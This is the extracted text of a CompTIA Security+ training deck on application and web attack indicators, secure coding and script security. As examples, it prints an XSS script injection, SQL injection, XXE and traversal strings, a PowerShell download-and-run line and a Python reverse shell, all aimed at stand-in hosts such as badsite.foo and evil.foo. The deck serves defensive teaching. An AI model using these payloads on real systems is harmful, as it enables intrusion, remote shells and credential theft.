reflection 3
Summarizing Secure Application Concepts
Lesson 14
1
Analyze Indicators of Application Attacks
Topic 14A
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
2
2
1.3 Given a scenario, analyze potential indicators associated with application attacks
Syllabus Objectives Covered
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
3
Application Attacks
Attacks that target vulnerabilities in application code or architecture/design
Privilege escalation
Get privileges from target vulnerable process to run arbitrary code
Remote execution when code is transferred from another machine
Vertical and horizontal privilege escalation
Detect by process logging and auditing plus automated detection scanning
Error handling
Identify attack from error messages
Leaking information through errors
Improper input handling
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
4
4
Overflow Vulnerabilities
Buffer overflow
Buffer is memory allocated to application
Overflows can allow arbitrary code to execute
Integer overflow
Cause application to calculate values that are out-of-bounds
Could use to cause crash or use in buffer overflow attack
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
5
Null Pointer Dereferencing and Race Conditions
Pointers are used in C/C++ to refer to memory locations
Dereferencing occurs when the program tries to read or write the location via the pointer
If the location is null or invalid, the process will crash
Race condition
Execution depends on timing and sequence of events
Time of check/time of use (TOCTTOU)
Environment is manipulated to change a resource after checking but before use
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
6
Memory Leaks and Resource Exhaustion
Memory leaks
Process allocates memory locations, but never releases them
Can cause host to run out of memory
Could be faulty code or could be malicious
Resource exhaustion
CPU time, system memory allocation, fixed disk capacity, and network utilization
Spawning activity to use up these resources
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
7
DLL Injection and Driver Manipulation
Dynamic Link Library (DLL) implements some function that multiple processes can use
DLL injection forces a process to load malicious DLL
Refactoring might allow code obfuscation to elude anti-virus
Shim
Exploit application compatibility framework to allow malware to persist on host
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
8
Pass the Hash Attack
Exploiting cached credentials to perform lateral movement
Windows hosts cache credentials in memory as NTLM hashes
Local malicious process with administrator privileges can dump these hashes
Malware executes another process on a remote host
Attacker can just pass hash without having to crack it
Remote host will accept hash as credential
Detection through security log events
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
9
Images © 123rf.com.
9
Indicators of Application Attacks
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
10
Review Activity
Assisted Lab
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Identifying Application Attack Indicators
11
Lab Activity
Analyze Indicators of Web Application Attacks
Topic 14B
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
12
12
1.3 Given a scenario, analyze potential indicators associated with application attacks
Syllabus Objectives Covered
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
13
Uniform Resource Locator Analysis
Uniform Resource Locator (URL) format
HTTP methods
TCP connections
GET, POST, PUT, HEAD
POST or PUT
URL (query parameters)
Fragment/anchor ID
HTTP response codes
Percent encoding
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
14
14
Application Programming Interface Attacks
API calls and parameters
Must only be with HTTPS encryption
Common weaknesses and vulnerabilities
Ineffective secrets management
Lack of input validation
Error messages leaking information
Denial of service
https://webapp.foo/?Action=RunInstance&Id=123&Count=1& InstanceAccessKey=MyInstanceAccessKey&Placement=us-east&
MyAuthorizationToken
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
15
15
Replay Attacks
Resubmitting or guessing authorization tokens
Session management cookies
Replay cookie to obtain authenticated session
Secure cookies
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
16
16
Session Hijacking and Cross-site Request Forgery (1)
Cookie hijacking and session prediction
Client-side/cross-site (CSRF/XSRF) request forgery
Passes a URL to another site where the user has an authenticated session
Confused deputy
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
17
Images © 123rf.com.
Session Hijacking and Cross-site Request Forgery (2)
Clickjacking
Add invisible layer to intercept/redirect click events
SSL strip
Exploits redirect from HTTP to HTTPS
Sites should no longer be using plain HTTP
HTTP Strict Transport Security (HSTS)
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
18
Cross-Site Scripting (XSS)
Attacker injects code in trusted site that will be executed in client browser
Non-persistent/reflected
Coded in a link that the user must click
Persistent/stored XSS
Injected into a database the site uses to serve content
Client-side scripts
Document Object Model (DOM)
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
19
Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.
https://trusted.foo/messages#user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E
Structured Query Language Injection Attacks
Client-side versus server-side attacks
Injection-type attacks
Structured Query Language (SQL) statements
SELECT, INSERT, DELETE, UPDATE, WHERE
SQL injection
Pass SQL statements to the web application via user input or URL
Show or insert database records
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
20
SELECT * FROM tbl_user WHERE username = '' or 1=1--#
Extensible Markup Language (XML) injection
XML tagged documents
XML External Entity (XXE) to exfiltrate data and files
Lightweight Directory Access Protocol (LDAP) injection
Query language to read and update network directories
XML and LDAP Injection Attacks
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY bar SYSTEM "file:///etc/config"> ]>
<bar>&bar;</bar>
(&(username=Bob)(&))
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
21
Directory Traversal and Command Injection Attacks
Directory traversal
Obtain access to files outside web site root directory
Canonicalization attack and percent encoding
Command injection
Cause server to run OS shell commands
http://victim.foo/?show=../../../../etc/config
http://victim.foo/?show=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/config
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
22
Server-side Request Forgery
Cause a server to make API calls or HTTP requests with arbitrary parameters
Weak authentication/access control between internal services
Weak input validation and faults in request parsing
Variety of exploit techniques and aims
Reconnaissance
Credential stealing
Unauthorized requests
Protocol smuggling
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
23
Images © 123rf.com.
Indicators of Web Application Attacks
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
24
Review Activity
Assisted Lab
Identifying a Browser Attack
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
25
Lab Activity
Summarize Secure Coding Practices
Topic 14C
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
26
26
2.3 Summarize secure application development, deployment, and automation concepts
3.2 Given a scenario, implement host or application security solutions
Syllabus Objectives Covered
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
27
Secure Coding Techniques
Security development life cycles and best practice guides
Open Web Application Security Project (OWASP)
Input validation
User-generated data typed/entered via form controls
Passed by another program (URL or HTTP header)
Document and test all types of user/API input
Normalization and output encoding
Strip illegal characters and substrings and use a predictable format and character set for the context in which the output is used
Check all data being passed as output
Differences between character sets and encoding methods
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
28
Server-side versus Client-side Validation
Client-side execution
Code is run by the browser
Document Object Model (DOM) scripting
Might send a request to the server, but the request is constructed by the client
Server-side execution
Code is run by the server
Client-side input validation
Code is not running in a fully trusted environment
Server-side input validation
Might require complex transactions, slowing down process
Both used together
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
29
Secure cookies
Avoid using persistent cookies for session authentication
Set the Secure attribute
Set the HttpOnly attribute
Use the SameSite attribute
Response headers
HTTP Strict Transport Security (HSTS)
Content Security Policy (CSP)
Cache-Control
Web Application Security
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
30
30
Data Exposure and Memory Management
Data exposure
Allowing privileged data to be read without authorization
Weak authentication/session management
Lack of encryption
Error handling
Structured exception handler (SEH)
Prevent use of error conditions for arbitrary code/injection
Prevent display of default messages
Memory management
Use of unsecure functions
Input validation and overflow protection
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
31
Secure Code Usage
Code reuse
Using a block of code in a different context
Third-party libraries/DLLs
Monitor shared libraries for known vulnerabilities and patches
Software development kit (SDK)
Sample code/libraries
Stored procedures
Pre-built functions for querying databases
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
32
Other Secure Coding Practices
Unreachable and dead code
Code that cannot be executed or does not affect program flow
Obfuscation/camouflage
Disguise nature of code
Inhibit reverse engineering
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
33
Static Code Analysis
Static/source code analysis
Submit code for analysis by automated software
Manual code review
Human analysis of source code
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
34
Dynamic Code Analysis
Run application in a staging environment for testing
Fuzzing and stress testing
Application UI
Protocol
File format
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
35
Screenshot Burp Suite portswigger.net/burp.
Secure Coding Practices
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
36
Review Activity
Implement Secure Script Environments
Topic 14D
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
37
37
1.4 Given a scenario, analyze potential indicators associated with network attacks
3.2 Given a scenario, implement host or application security solutions
4.1 Given a scenario, use the appropriate tool to assess organizational security
Syllabus Objectives Covered
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
38
Scripting
Automation of activity through programs and scripts
Basic elements of a script
Parameters
Branching and looping statements
Validation and error handlers
Unit tests
Scripting languages
Domain-specific languages
Orchestration tools
Syntax
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
39
39
Basic syntax elements
Case sensitivity and indentation
Variables
Assignment and typing
Functions
Declaring functions
Logic and looping statements
Comparison operators
Control blocks
Modules
Libraries of functions
Execution
Within interpreter or compiled
Python Script Environment
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
40
def fullname(name,surname):
return name + " " + surname
#This ends the function definition
#The next line calls the function
greeting = 'Hello ' + fullname('World', '')
print(greeting)
40
PowerShell Script Environment
Cmdlets and functions
Verb-noun cmdlets
Return objects
Declaring functions
Logic and looping statements
Modules
function Cat-Name {
param ($name,$surname)
return $name + ' ' + $surname
}
#This ends the function declaration; the next statement calls it
$greeting = 'Hello ' + $(Cat-Name('World',''))
Write-Host $greeting
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
41
41
Prevent use of unauthorized code
Allow lists and block lists
Allow list control means that nothing can run if it is not on the approved list
Block list control means that anything not on the prohibited list can run
Code signing
OS-based Execution Control
Software Restriction Policies (SRP)
AppLocker
Windows Defender Application Control (WDAC)
SELinux
AppArmor
Execution Control
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
42
Malicious Code Indicators
Detection through monitoring platforms or host/process behavior analysis
Shellcode
Creates a process or injects a DLL
Credential dumping
Dumps credentials from lsass.exe
Lateral movement/insider attack
Remote execution
Persistence
Registry autorun keys
Services/scheduled tasks
Windows Management Instrumentation (WMI) event subscriptions
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
43
43
Exploit frameworks
Suspicious cmdlets
Creating processes or binaries
Downloading files
Bypassing execution policy
Using Windows API calls
Launching PowerShell from a different script type
PowerShell usage auditing
Execution control
Constrained language mode
Script tracing and logging
Prevent use of older versions
PowerShell Malicious Indicators
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
44
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://badsite.foo/DoEvil.ps1'); Do-Evil -StealCreds"
[Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\Temp\doevil.dll")
44
Bourne Again Shell (Bash)
Batch scripting for Linux command-line
Malicious indicators
Reconnaissance-type activity
Download tools
Crontab (task scheduler)
Account/firewall configuration changes
Web shells
Use of sockets to redirect terminal output to network port
File integrity scans with diff
Resource monitoring with top and free
Bash and Python Malicious Indicators
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
45
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("evil.foo",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")'
Macros and Visual Basic for Applications (VBA)
Macros record steps taken in office productivity application
Macros are coded in a scripting language
Virtual Basic for Applications (VBA)
Office document macros
JavaScript
PDF document macros
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
46
46
Man-in-the-Browser Attack
Compromise browser
Inspect session data
Change browser settings
Perform redirection
Perform code injection
Malicious plug-in/script/DLL
Browser Exploitation Framework (BeEF)
Exploit kits
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
47
Screenshot: Browser Exploitation Framework (beefproject.com).
Secure Script Environments
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
48
Review Activity
Assisted Labs
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Implementing PowerShell Security
Identifying Malicious Code
49
Lab Activity
Summarize Deployment and Automation Concepts
Topic 14E
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
50
50
2.3 Summarize secure application development, deployment, and automation concepts
Syllabus Objectives Covered
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
51
DevSecOps and requirements for greater automation
Completion of tasks without human intervention
Automation facilitates better scalability and elasticity
Scalability means that the costs involved in supplying the service to more users are linear
Elasticity refers to the system's ability to handle changes on demand in real time
Application Development, Deployment, and Automation
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
52
Secure Application Development Environments
Software development life cycle (SDLC)
Waterfall and Agile
Quality assurance (QA)
Development environments
Preserving environment integrity
Sandboxing
Secure baseline
Integrity measurement
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
53
Images © 123rf.com.
Provisioning, Deprovisioning, and Version Control
Provisioning is the process of deploying an application to the target environment
Installer/setup package
Instance (VM with OS and application)
Deprovisioning is the process of removing an application from packages or instances
Version control
Customer version ID
Developer build ID
Source code version control
Code commits and backups
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
54
Automation/Scripting Release Paradigms
Waterfall versus Agile SDLCs
Continuous integration
Commit updates often
Reduce commit conflicts
Continuous delivery
Push updates to staging infrastructure
Continuous deployment
Push updated code to production
Continuous monitoring and automated courses of action
Continuous validation
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
55
Images © 123rf.com.
Software Diversity
Runtime environment
Compiled code
Interpreted code
Software diversity as obfuscation
Security by diversity
Avoid monocultures to make attacks harder to develop
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
56
Deployment and Automation Concepts
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
57
Review Activity
Summary
Lesson 14
CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
58
58